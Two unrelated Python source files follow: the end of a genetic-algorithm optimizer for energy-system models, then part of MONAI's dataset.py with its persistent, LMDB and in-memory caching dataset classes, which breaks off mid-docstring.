step_size = av.val_step or 1.0 # required for ascent
self.population = []
for i in range(num_results):
# generate two children around parent to get gradient
parent = new_result[i]
# "below" parent, clip to minimum
child1 = Individual([gene for gene in parent])
child1[av_idx] = max(parent[av_idx] - step_size, av.val_min)
child1_fingerprint = str(child1)
# "above" parent, clip to maximum
child2 = Individual([gene for gene in parent])
child2[av_idx] = min(parent[av_idx] + step_size, av.val_max)
child2_fingerprint = str(child2)
# add to population. Take evaluated if exists
try:
self.population.append(self.evaluated[child1_fingerprint])
except KeyError:
self.population.append(child1)
try:
self.population.append(self.evaluated[child2_fingerprint])
except KeyError:
self.population.append(child2)
# compute fitness of all new children
# Keep invalid to preserve order (match parent to children)
self.compute_fitness()
# take note which direction is best for each individual
# may be positive or negative step size or 0 (no fitness improvement)
step = [0] * num_results
for i in range(num_results):
parent = new_result[i]
child1 = self.population[2*i]
child2 = self.population[2*i+1]
# get domination within family
if child1.dominates(parent):
if child2.dominates(child1):
# child 2 dominates
step[i] = step_size
new_result[i] = child2
else:
# child 1 dominates
step[i] = -step_size
new_result[i] = child1
else:
# child1 does not dominate parent
if child2.dominates(parent):
# child 2 dominates
step[i] = step_size
new_result[i] = child2
else:
# parent is not dominated
step[i] = 0.0
# continue gradient ascent of solutions until local optimum reached for all
while sum(map(abs, step)) != 0.0:
# still improvement: create new population
self.population = []
# dict for saving position of parent element
reference = {}
idx = 0
# build new population
# only parents with step != 0 (still changing)
# each parent with step != 0 at least once
# fill up to n_cores with multiples of steps
# only non-evaluated configurations allowed
while(len(self.population) < max(num_results, self.n_core)):
# position of parent element
pos = idx % num_results
# multiplier for step size (at least 1)
mult = (idx // num_results) + 1
if mult > 1 and len(self.population) >= self.n_core:
# population full
break
if idx > 1000 * num_results:
# avoid endless loop (no more valid entries?)
break
if step[pos]:
# result with step: generate child in step direction
parent = new_result[pos]
child = Individual([gene for gene in parent])
mul_step = step[pos] * mult
child[av_idx] = min(max(parent[av_idx] + mul_step, av.val_min), av.val_max)
fingerprint = str(child)
# avoid double computation
if fingerprint not in self.evaluated:
# child config not seen so far
self.population.append(child)
# block, so not in population again
self.evaluated[fingerprint] = None
# keep track of parent position
reference[len(self.population) - 1] = pos
idx += 1
# compute fitness of all new children
# Keep invalid to preserve order (match children to parent)
self.compute_fitness()
# check new dominance of parent and children
# default: no improvement -> stop ascent of this attribute
new_step = [0] * len(step)
for idx, child in enumerate(self.population):
parent_idx = reference[idx]
parent = new_result[parent_idx]
if child.dominates(parent):
# domination continues: save child, keep base step
# this ensures a new generation
new_result[parent_idx] = child
new_step[parent_idx] = step[parent_idx]
# update step sizes
step = new_step
# show current result in plot
if self.plot_progress and self.plot_process.is_alive():
self.plot_pipe_tx.send({
                        'title': 'Gradient ascent of AV #{}'.format(av_idx+1),
'values': new_result
})
# no more changes in any solution for this AV: give status update
if self.save_intermediate_results:
self.save_intermediate_result(new_result)
# show current result in plot
if self.plot_progress and self.plot_process.is_alive():
self.plot_pipe_tx.send({
                    'title': 'Front after gradient ascent of AV #{}'.format(av_idx+1),
'values': new_result
})
# change next AV
return new_result
def run(self):
"""Main GA function
:return: pareto-optimal configurations
:rtype: list of :class:`Individual`
"""
random.seed() # init RNG
print('\n+++++++ START GENETIC ALGORITHM +++++++')
print('The optimization parameters chosen are:')
print(' population_size: {}'.format(self.population_size))
print(' n_generation: {}'.format(self.n_generation))
print(' n_core: {}'.format(self.n_core))
print('+++++++++++++++++++++++++++++++++++++++\n')
result = []
for gen in range(self.n_generation):
# generate offspring
children = []
# only children not seen before allowed in population
# set upper bound for maximum number of generated children
# population may not be pop_size big (invalid individuals)
for tries in range(1000 * self.population_size):
if (len(children) == self.population_size):
# population full (pop_size new individuals)
break
# get random parents from pop_size best results
try:
[parent1, parent2] = random.sample(self.population, 2)
# crossover and mutate parents
child = mutate(crossover(parent1, parent2), self.attribute_variation)
except ValueError:
# not enough parents left / initial generation: generate random configuration
individual = []
for av in self.attribute_variation:
if av.val_step:
value = random.randrange(0, av.num_steps) * av.val_step + av.val_min
else:
value = random.uniform(av.val_min, av.val_max)
individual.append(value)
child = Individual(individual)
# check if child configuration has been seen before
fingerprint = str(child)
if fingerprint not in self.evaluated:
# child config not seen so far
children.append(child)
# block, so not in population again
self.evaluated[fingerprint] = None
else:
print("Warning: number of retries exceeded. \
{} new configurations generated.".format(len(children)))
if len(children) == 0:
# no new children could be generated
print("Aborting.")
break
# New population generated (parents + children)
self.population += children
# evaluate generated population
self.compute_fitness()
# filter out individuals with invalid fitness values
self.population = list(
filter(lambda ind: ind is not None and ind.fitness is not None, self.population))
if len(self.population) == 0:
# no configuration was successful
print("No individuals left. Building new population.")
continue
# sort population by fitness
f1_vals2 = [i.fitness[0] for i in self.population]
f2_vals2 = [i.fitness[1] for i in self.population]
FNDS = fast_non_dominated_sort(self.population)
CDF_values = [CDF(f1_vals2, f2_vals2, len(NDS)) for NDS in FNDS]
# select individuals on pareto front, depending on fitness and distance
pop_idx = []
for i in range(0, len(FNDS)):
FNDS2 = [FNDS[i].index(FNDS[i][j]) for j in range(0, len(FNDS[i]))]
front22 = sort_by_values(len(FNDS2), CDF_values[i])
front = [FNDS[i][front22[j]] for j in range(0, len(FNDS[i]))]
front.reverse()
pop_idx += [v for v in front[:self.population_size-len(pop_idx)]]
if (len(pop_idx) == self.population_size):
break
# save pareto front
# values/fitness tuples for all non-dominated individuals
result = [self.population[i] for i in FNDS[0]]
# print info of current pareto front
print("The best front for Generation # {} / {} is".format(
gen+1, self.n_generation))
for i, v in enumerate(FNDS[0]):
print(i, self.population[v], self.population[v].fitness)
print("\n")
# save result to file
if self.save_intermediate_results:
self.save_intermediate_result(result)
# show current pareto front in plot
if self.plot_progress and self.plot_process.is_alive():
self.plot_pipe_tx.send({
'title': 'Front for Generation #{}'.format(gen + 1),
'values': result
})
self.population = [self.population[i] for i in pop_idx]
# next generation
result.sort(key=lambda v: -v.fitness[0])
if self.post_processing:
result = self.gradient_ascent(result)
print('\n+++++++ GENETIC ALGORITHM FINISHED +++++++')
for i, attr in enumerate(self.attribute_variation):
print(' {} - {}'.format(
attr.comp_name, attr.comp_attribute))
for i, v in enumerate(result):
print(i, v.values, " -> ", dict(zip(self.objective_names, v.fitness)))
print('+++++++++++++++++++++++++++++++++++++++++++\n')
if self.plot_progress and self.plot_process.is_alive():
self.plot_pipe_tx.send(None) # stop drawing, show plot
self.plot_process.join() # wait until user closes plot
# remove old intermediate results
if self.save_intermediate_results:
if os.path.exists(self.last_result_file_name):
os.remove(self.last_result_file_name)
if os.path.exists(self.current_result_file_name):
os.remove(self.current_result_file_name)
return result
def run_optimization(opt_config, _model):
"""Entry point for genetic algorithm
:param opt_config: Optimization parameters.
May have separate `ga_params` dictionary or define parameters directly.
See :class:`Optimization`.
:type opt_config: dict
:param _model: smooth model
:type _model: dict or list (legacy)
:return: pareto-optimal configurations
:rtype: list of :class:`Individual`
"""
# save GA params directly in config
opt_config.update(opt_config.pop("ga_params", dict))
if isinstance(_model["components"], list):
# simplify oemof model: instead of components array, have dict with component names as key
_names = [c.pop("name") for c in _model["components"]]
_model.update({'components': dict(zip(_names, _model["components"]))})
# save oemof model in config
opt_config.update({"model": _model})
# run GA
return Optimization(opt_config).run()
|
dataset.py
|
# Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections.abc
import math
import pickle
import shutil
import sys
import tempfile
import threading
import time
import warnings
from copy import copy, deepcopy
from multiprocessing.pool import ThreadPool
from pathlib import Path
from typing import IO, TYPE_CHECKING, Any, Callable, Dict, List, Optional, Sequence, Union
import numpy as np
import torch
from torch.serialization import DEFAULT_PROTOCOL
from torch.utils.data import Dataset as _TorchDataset
from torch.utils.data import Subset
from monai.data.utils import SUPPORTED_PICKLE_MOD, convert_tables_to_dicts, pickle_hashing
from monai.transforms import Compose, Randomizable, ThreadUnsafe, Transform, apply_transform, convert_to_contiguous
from monai.utils import MAX_SEED, deprecated_arg, get_seed, look_up_option, min_version, optional_import
from monai.utils.misc import first
if TYPE_CHECKING:
from tqdm import tqdm
has_tqdm = True
else:
tqdm, has_tqdm = optional_import("tqdm", "4.47.0", min_version, "tqdm")
lmdb, _ = optional_import("lmdb")
pd, _ = optional_import("pandas")
class Dataset(_TorchDataset):
"""
A generic dataset with a length property and an optional callable data transform
when fetching a data sample.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, typical input data can be a list of dictionaries::
[{ { {
'img': 'image1.nii.gz', 'img': 'image2.nii.gz', 'img': 'image3.nii.gz',
'seg': 'label1.nii.gz', 'seg': 'label2.nii.gz', 'seg': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
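    A minimal usage sketch (`data` and `transform` as described above)::

        dataset = Dataset(data=data, transform=transform)
        first_item = dataset[0]   # a single (transformed) data item
        subset = dataset[1:4]     # a torch.utils.data.Subset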
"""
def __init__(self, data: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: a callable data transform on input data.
"""
self.data = data
self.transform = transform
def __len__(self) -> int:
return len(self.data)
def _transform(self, index: int):
"""
Fetch single data item from `self.data`.
"""
data_i = self.data[index]
return apply_transform(self.transform, data_i) if self.transform is not None else data_i
def __getitem__(self, index: Union[int, slice, Sequence[int]]):
"""
Returns a `Subset` if `index` is a slice or Sequence, a data item otherwise.
"""
if isinstance(index, slice):
# dataset[:42]
start, stop, step = index.indices(len(self))
indices = range(start, stop, step)
return Subset(dataset=self, indices=indices)
if isinstance(index, collections.abc.Sequence):
# dataset[[1, 3, 4]]
return Subset(dataset=self, indices=index)
return self._transform(index)
class DatasetFunc(Dataset):
"""
Execute function on the input dataset and leverage the output to act as a new Dataset.
It can be used to load / fetch the basic dataset items, like the list of `image, label` paths.
Or chain together to execute more complicated logic, like `partition_dataset`, `resample_datalist`, etc.
The `data` arg of `Dataset` will be applied to the first arg of callable `func`.
Usage example::
data_list = DatasetFunc(
data="path to file",
func=monai.data.load_decathlon_datalist,
data_list_key="validation",
base_dir="path to base dir",
)
# partition dataset for every rank
data_partition = DatasetFunc(
data=data_list,
func=lambda **kwargs: monai.data.partition_dataset(**kwargs)[torch.distributed.get_rank()],
num_partitions=torch.distributed.get_world_size(),
)
dataset = Dataset(data=data_partition, transform=transforms)
Args:
data: input data for the func to process, will apply to `func` as the first arg.
func: callable function to generate dataset items.
kwargs: other arguments for the `func` except for the first arg.
"""
def __init__(self, data: Any, func: Callable, **kwargs) -> None:
super().__init__(data=None, transform=None) # type:ignore
self.src = data
self.func = func
self.kwargs = kwargs
self.reset()
def reset(self, data: Optional[Any] = None, func: Optional[Callable] = None, **kwargs):
"""
Reset the dataset items with specified `func`.
Args:
data: if not None, execute `func` on it, default to `self.src`.
func: if not None, execute the `func` with specified `kwargs`, default to `self.func`.
kwargs: other arguments for the `func` except for the first arg.
"""
src = self.src if data is None else data
self.data = self.func(src, **self.kwargs) if func is None else func(src, **kwargs)
class PersistentDataset(Dataset):
"""
    Persistent storage of pre-computed values to efficiently manage larger-than-memory dictionary format data.
    It can operate transforms for specific fields. Results from the non-random transform components are computed
when first used, and stored in the `cache_dir` for rapid retrieval on subsequent uses.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
The transforms which are supposed to be cached must implement the `monai.transforms.Transform`
interface and should not be `Randomizable`. This dataset will cache the outcomes before the first
`Randomizable` `Transform` within a `Compose` instance.
For example, typical input data can be a list of dictionaries::
[{ { {
'image': 'image1.nii.gz', 'image': 'image2.nii.gz', 'image': 'image3.nii.gz',
'label': 'label1.nii.gz', 'label': 'label2.nii.gz', 'label': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
For a composite transform like
.. code-block:: python
[ LoadImaged(keys=['image', 'label']),
Orientationd(keys=['image', 'label'], axcodes='RAS'),
ScaleIntensityRanged(keys=['image'], a_min=-57, a_max=164, b_min=0.0, b_max=1.0, clip=True),
RandCropByPosNegLabeld(keys=['image', 'label'], label_key='label', spatial_size=(96, 96, 96),
pos=1, neg=1, num_samples=4, image_key='image', image_threshold=0),
ToTensord(keys=['image', 'label'])]
    Upon first use a filename-based dataset will be processed by the transforms
    [LoadImaged, Orientationd, ScaleIntensityRanged] and the resulting tensor written to
    the `cache_dir` before applying the remaining random-dependent transforms
    [RandCropByPosNegLabeld, ToTensord] for use in the analysis.
Subsequent uses of a dataset directly read pre-processed results from `cache_dir`
    followed by applying the random-dependent parts of transform processing.
During training call `set_data()` to update input data and recompute cache content.
Note:
        The input data must be a list of file paths, which are hashed to form the cache keys.
        When loading persistent cache content, there is no guarantee that the cached data matches the
        current transform chain, so make sure to use exactly the same non-random transforms and
        arguments as were used to build the cache content; otherwise, unexpected errors may occur.
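    A minimal construction sketch (the file paths, transform list and cache location are illustrative):

    .. code-block:: python

        dataset = PersistentDataset(
            data=[{"image": "image1.nii.gz", "label": "label1.nii.gz"}],
            transform=transform,  # e.g. the Compose list shown above
            cache_dir="./persistent_cache",
        )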
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Optional[Union[Path, str]],
hash_func: Callable[..., bytes] = pickle_hashing,
pickle_module: str = "pickle",
pickle_protocol: int = DEFAULT_PROTOCOL,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
                `PersistentDataset` expects the input data to be a list of serializable items
                and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If `cache_dir` doesn't exist, will automatically create it.
If `cache_dir` is `None`, there is effectively no caching.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
pickle_module: string representing the module used for pickling metadata and objects,
                default to `"pickle"`. Due to the pickle limitation in the multi-processing of DataLoader,
                we can't pass the `pickle` module as the arg directly, so here we use a string name instead.
                If you want to use another pickle module at runtime, just register it like:
>>> from monai.data import utils
>>> utils.SUPPORTED_PICKLE_MOD["test"] = other_pickle
this arg is used by `torch.save`, for more details, please check:
https://pytorch.org/docs/stable/generated/torch.save.html#torch.save,
and ``monai.data.utils.SUPPORTED_PICKLE_MOD``.
pickle_protocol: can be specified to override the default protocol, default to `2`.
this arg is used by `torch.save`, for more details, please check:
https://pytorch.org/docs/stable/generated/torch.save.html#torch.save.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.cache_dir = Path(cache_dir) if cache_dir is not None else None
self.hash_func = hash_func
self.pickle_module = pickle_module
self.pickle_protocol = pickle_protocol
if self.cache_dir is not None:
if not self.cache_dir.exists():
self.cache_dir.mkdir(parents=True, exist_ok=True)
if not self.cache_dir.is_dir():
raise ValueError("cache_dir must be a directory.")
def set_data(self, data: Sequence):
"""
Set the input data and delete all the out-dated cache content.
"""
self.data = data
if self.cache_dir is not None and self.cache_dir.exists():
shutil.rmtree(self.cache_dir, ignore_errors=True)
self.cache_dir.mkdir(parents=True, exist_ok=True)
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the first random element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the first identified
random transform object
"""
for _transform in self.transform.transforms: # type:ignore
# execute all the deterministic transforms
if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
break
# this is to be consistent with CacheDataset even though it's not in a multi-thread situation.
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item_transformed = apply_transform(_xform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the first random transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first random transform)
Returns:
the transformed element through the random transforms
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
start_post_randomize_run = False
for _transform in self.transform.transforms:
if (
start_post_randomize_run
or isinstance(_transform, Randomizable)
or not isinstance(_transform, Transform)
):
start_post_randomize_run = True
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
def _cachecheck(self, item_transformed):
"""
A function to cache the expensive input data transform operations
so that huge data sets (larger than computer memory) can be processed
on the fly as needed, and intermediate results written to disk for
future use.
Args:
item_transformed: The current data element to be mutated into transformed representation
Returns:
The transformed data_element, either from cache, or explicitly computing it.
Warning:
The current implementation does not encode transform information as part of the
hashing mechanism used for generating cache names. If the transforms applied are
changed in any way, the objects in the cache dir will be invalid. The hash for the
            cache is ONLY dependent on the input filename paths.
"""
hashfile = None
if self.cache_dir is not None:
data_item_md5 = self.hash_func(item_transformed).decode("utf-8")
hashfile = self.cache_dir / f"{data_item_md5}.pt"
if hashfile is not None and hashfile.is_file(): # cache hit
try:
return torch.load(hashfile)
except PermissionError as e:
if sys.platform != "win32":
raise e
_item_transformed = self._pre_transform(deepcopy(item_transformed)) # keep the original hashed
if hashfile is None:
return _item_transformed
try:
# NOTE: Writing to a temporary directory and then using a nearly atomic rename operation
# to make the cache more robust to manual killing of parent process
# which may leave partially written cache files in an incomplete state
with tempfile.TemporaryDirectory() as tmpdirname:
temp_hash_file = Path(tmpdirname) / hashfile.name
torch.save(
obj=_item_transformed,
f=temp_hash_file,
pickle_module=look_up_option(self.pickle_module, SUPPORTED_PICKLE_MOD),
pickle_protocol=self.pickle_protocol,
)
if temp_hash_file.is_file() and not hashfile.is_file():
# On Unix, if target exists and is a file, it will be replaced silently if the user has permission.
# for more details: https://docs.python.org/3/library/shutil.html#shutil.move.
try:
shutil.move(temp_hash_file, hashfile)
except FileExistsError:
pass
except PermissionError: # project-monai/monai issue #3613
pass
return _item_transformed
def _transform(self, index: int):
pre_random_item = self._cachecheck(self.data[index])
return self._post_transform(pre_random_item)
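# Editor's note: a minimal usage sketch (not part of the original module); the file
# names and the "./persistent_cache" directory are hypothetical placeholders. The
# deterministic LoadImaged/ScaleIntensityd outputs are cached under `cache_dir`,
# while the random RandFlipd is re-applied on every access.
def _example_persistent_dataset():
    from monai.transforms import Compose, LoadImaged, RandFlipd, ScaleIntensityd

    data = [{"image": f"img{i}.nii.gz"} for i in range(4)]
    transform = Compose(
        [
            LoadImaged(keys="image"),
            ScaleIntensityd(keys="image"),
            RandFlipd(keys="image", prob=0.5),
        ]
    )
    return PersistentDataset(data=data, transform=transform, cache_dir="./persistent_cache")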
class CacheNTransDataset(PersistentDataset):
"""
    Extension of `PersistentDataset` that can also cache the results of the first N transforms,
    regardless of whether they are random or not.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_n_trans: int,
cache_dir: Optional[Union[Path, str]],
hash_func: Callable[..., bytes] = pickle_hashing,
pickle_module: str = "pickle",
pickle_protocol: int = DEFAULT_PROTOCOL,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
                `PersistentDataset` expects the input data to be a list of serializable items
                and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_n_trans: cache the result of first N transforms.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If `cache_dir` doesn't exist, will automatically create it.
If `cache_dir` is `None`, there is effectively no caching.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
pickle_module: string representing the module used for pickling metadata and objects,
                default to `"pickle"`. Due to the pickle limitation in the multi-processing of DataLoader,
                we can't pass the `pickle` module as the arg directly, so here we use a string name instead.
                If you want to use another pickle module at runtime, just register it like:
>>> from monai.data import utils
>>> utils.SUPPORTED_PICKLE_MOD["test"] = other_pickle
this arg is used by `torch.save`, for more details, please check:
https://pytorch.org/docs/stable/generated/torch.save.html#torch.save,
and ``monai.data.utils.SUPPORTED_PICKLE_MOD``.
pickle_protocol: can be specified to override the default protocol, default to `2`.
this arg is used by `torch.save`, for more details, please check:
https://pytorch.org/docs/stable/generated/torch.save.html#torch.save.
"""
super().__init__(
data=data,
transform=transform,
cache_dir=cache_dir,
hash_func=hash_func,
pickle_module=pickle_module,
pickle_protocol=pickle_protocol,
)
self.cache_n_trans = cache_n_trans
def _pre_transform(self, item_transformed):
"""
        Process the data from the original state up through the first N transforms.
Args:
item_transformed: The data to be transformed
Returns:
            the transformed element after the first N transforms
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i == self.cache_n_trans:
break
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item_transformed = apply_transform(_xform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
        Process the data from the (N + 1)-th transform to the final state ready for evaluation.
Args:
            item_transformed: The data to be transformed (already processed by the first N transforms)
Returns:
the final transformed result
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i >= self.cache_n_trans:
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
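# Editor's note: an illustrative sketch (hypothetical file names). With cache_n_trans=2,
# the output of the first two transforms is cached, including the random RandFlipd,
# which plain PersistentDataset would never cache.
def _example_cache_n_trans_dataset():
    from monai.transforms import Compose, LoadImaged, RandFlipd, ScaleIntensityd

    data = [{"image": f"img{i}.nii.gz"} for i in range(4)]
    transform = Compose(
        [
            LoadImaged(keys="image"),
            RandFlipd(keys="image", prob=0.5),
            ScaleIntensityd(keys="image"),
        ]
    )
    return CacheNTransDataset(data=data, transform=transform, cache_n_trans=2, cache_dir="./cache_n_trans")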
class LMDBDataset(PersistentDataset):
"""
Extension of `PersistentDataset` using LMDB as the backend.
See Also:
:py:class:`monai.data.PersistentDataset`
Examples:
>>> items = [{"data": i} for i in range(5)]
# [{'data': 0}, {'data': 1}, {'data': 2}, {'data': 3}, {'data': 4}]
>>> lmdb_ds = monai.data.LMDBDataset(items, transform=monai.transforms.SimulateDelayd("data", delay_time=1))
>>> print(list(lmdb_ds)) # using the cached results
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Union[Path, str] = "cache",
hash_func: Callable[..., bytes] = pickle_hashing,
db_name: str = "monai_cache",
progress: bool = True,
pickle_protocol=pickle.HIGHEST_PROTOCOL,
lmdb_kwargs: Optional[dict] = None,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
                `LMDBDataset` expects the input data to be a list of serializable items
                and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: if specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If the cache_dir doesn't exist, will automatically create it. Defaults to "./cache".
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
db_name: lmdb database file name. Defaults to "monai_cache".
progress: whether to display a progress bar.
pickle_protocol: pickle protocol version. Defaults to pickle.HIGHEST_PROTOCOL.
https://docs.python.org/3/library/pickle.html#pickle-protocols
lmdb_kwargs: additional keyword arguments to the lmdb environment.
for more details please visit: https://lmdb.readthedocs.io/en/release/#environment-class
"""
super().__init__(
data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func, pickle_protocol=pickle_protocol
)
self.progress = progress
if not self.cache_dir:
raise ValueError("cache_dir must be specified.")
self.db_file = self.cache_dir / f"{db_name}.lmdb"
self.lmdb_kwargs = lmdb_kwargs or {}
if not self.lmdb_kwargs.get("map_size", 0):
self.lmdb_kwargs["map_size"] = 1024 ** 4 # default map_size
# lmdb is single-writer multi-reader by default
# the cache is created without multi-threading
self._read_env = None
# this runs on the primary thread/process
self._fill_cache_start_reader(show_progress=self.progress)
print(f"Accessing lmdb file: {self.db_file.absolute()}.")
def set_data(self, data: Sequence):
"""
Set the input data and delete all the out-dated cache content.
"""
super().set_data(data=data)
self._read_env = self._fill_cache_start_reader(show_progress=self.progress)
def _fill_cache_start_reader(self, show_progress=True):
"""
        Check the LMDB cache and write the cache if needed. py-lmdb doesn't have good support for concurrent writes.
        This method can be used by multiple processes, but it may have a negative impact on performance.
Args:
show_progress: whether to show the progress bar if possible.
"""
# create cache
self.lmdb_kwargs["readonly"] = False
env = lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
if show_progress and not has_tqdm:
warnings.warn("LMDBDataset: tqdm is not installed. not displaying the caching progress.")
with env.begin(write=False) as search_txn:
for item in tqdm(self.data) if has_tqdm and show_progress else self.data:
key = self.hash_func(item)
done, retry, val = False, 5, None
while not done and retry > 0:
try:
with search_txn.cursor() as cursor:
done = cursor.set_key(key)
if done:
continue
if val is None:
val = self._pre_transform(deepcopy(item)) # keep the original hashed
val = pickle.dumps(val, protocol=self.pickle_protocol)
with env.begin(write=True) as txn:
txn.put(key, val)
done = True
except lmdb.MapFullError:
done, retry = False, retry - 1
size = env.info()["map_size"]
new_size = size * 2
warnings.warn(
f"Resizing the cache database from {int(size) >> 20}MB" f" to {int(new_size) >> 20}MB."
)
env.set_mapsize(new_size)
except lmdb.MapResizedError:
# the mapsize is increased by another process
# set_mapsize with a size of 0 to adopt the new size
env.set_mapsize(0)
if not done: # still has the map full error
size = env.info()["map_size"]
env.close()
raise ValueError(f"LMDB map size reached, increase size above current size of {size}.")
size = env.info()["map_size"]
env.close()
# read-only database env
self.lmdb_kwargs["readonly"] = True
self.lmdb_kwargs["map_size"] = size
if self.lmdb_kwargs.get("lock", None) is None:
self.lmdb_kwargs["lock"] = False
if self.lmdb_kwargs.get("readahead", None) is None:
self.lmdb_kwargs["readahead"] = False
return lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
def _cachecheck(self, item_transformed):
"""
        If the item is not found in the LMDB file, fall back to the default `PersistentDataset` caching behaviour.
"""
if self._read_env is None:
# this runs on multiple processes, each one should have its own env.
self._read_env = self._fill_cache_start_reader(show_progress=False)
with self._read_env.begin(write=False) as txn:
data = txn.get(self.hash_func(item_transformed))
if data is None:
warnings.warn("LMDBDataset: cache key not found, running fallback caching.")
return super()._cachecheck(item_transformed)
try:
return pickle.loads(data)
except Exception as err:
raise RuntimeError("Invalid cache value, corrupted lmdb file?") from err
def info(self):
"""
Returns: dataset info dictionary.
"""
if self._read_env is None:
self._read_env = self._fill_cache_start_reader()
out = dict(self._read_env.info())
out["size"] = len(self.data)
out["filename"] = f"{self.db_file.absolute()}"
return out
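# Editor's note: an illustrative sketch with small in-memory items; "./lmdb_cache"
# and the 10 MB map_size are arbitrary example values forwarded to lmdb.open().
def _example_lmdb_dataset():
    from monai.transforms import ScaleIntensityd

    items = [{"image": np.arange(16, dtype=np.float32).reshape(1, 4, 4) + i} for i in range(3)]
    return LMDBDataset(
        data=items,
        transform=ScaleIntensityd(keys="image"),
        cache_dir="./lmdb_cache",
        lmdb_kwargs={"map_size": 10 * 1024 ** 2},
    )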
class CacheDataset(Dataset):
"""
Dataset with cache mechanism that can load data and cache deterministic transforms' result during training.
By caching the results of non-random preprocessing transforms, it accelerates the training data pipeline.
If the requested data is not in the cache, all transforms will run normally
(see also :py:class:`monai.data.dataset.Dataset`).
Users can set the cache rate or number of items to cache.
It is recommended to experiment with different `cache_num` or `cache_rate` to identify the best training speed.
The transforms which are supposed to be cached must implement the `monai.transforms.Transform`
interface and should not be `Randomizable`. This dataset will cache the outcomes before the first
`Randomizable` `Transform` within a `Compose` instance.
    To improve the caching efficiency, please always put as many non-random transforms as possible
    before the randomized ones when composing the chain of transforms.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, if the transform is a `Compose` of::
transforms = Compose([
LoadImaged(),
AddChanneld(),
Spacingd(),
Orientationd(),
ScaleIntensityRanged(),
RandCropByPosNegLabeld(),
ToTensord()
])
when `transforms` is used in a multi-epoch training pipeline, before the first training epoch,
this dataset will cache the results up to ``ScaleIntensityRanged``, as
all non-random transforms `LoadImaged`, `AddChanneld`, `Spacingd`, `Orientationd`, `ScaleIntensityRanged`
can be cached. During training, the dataset will load the cached results and run
    ``RandCropByPosNegLabeld`` and ``ToTensord``, as ``RandCropByPosNegLabeld`` is a randomized transform
    and its outcome is not cached.
During training call `set_data()` to update input data and recompute cache content, note that it requires
`persistent_workers=False` in the PyTorch DataLoader.
Note:
        `CacheDataset` executes non-random transforms and prepares cache content in the main process before
        the first epoch, then all the subprocesses of DataLoader will read the same cache content from the main process
        during training. It may take a long time to prepare the cache content, depending on the size of the expected cache data.
        So to debug or verify the program before the real training, users can set `cache_rate=0.0` or `cache_num=0` to
        temporarily skip caching.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_workers: Optional[int] = None,
progress: bool = True,
copy_cache: bool = True,
as_contiguous: bool = True,
) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
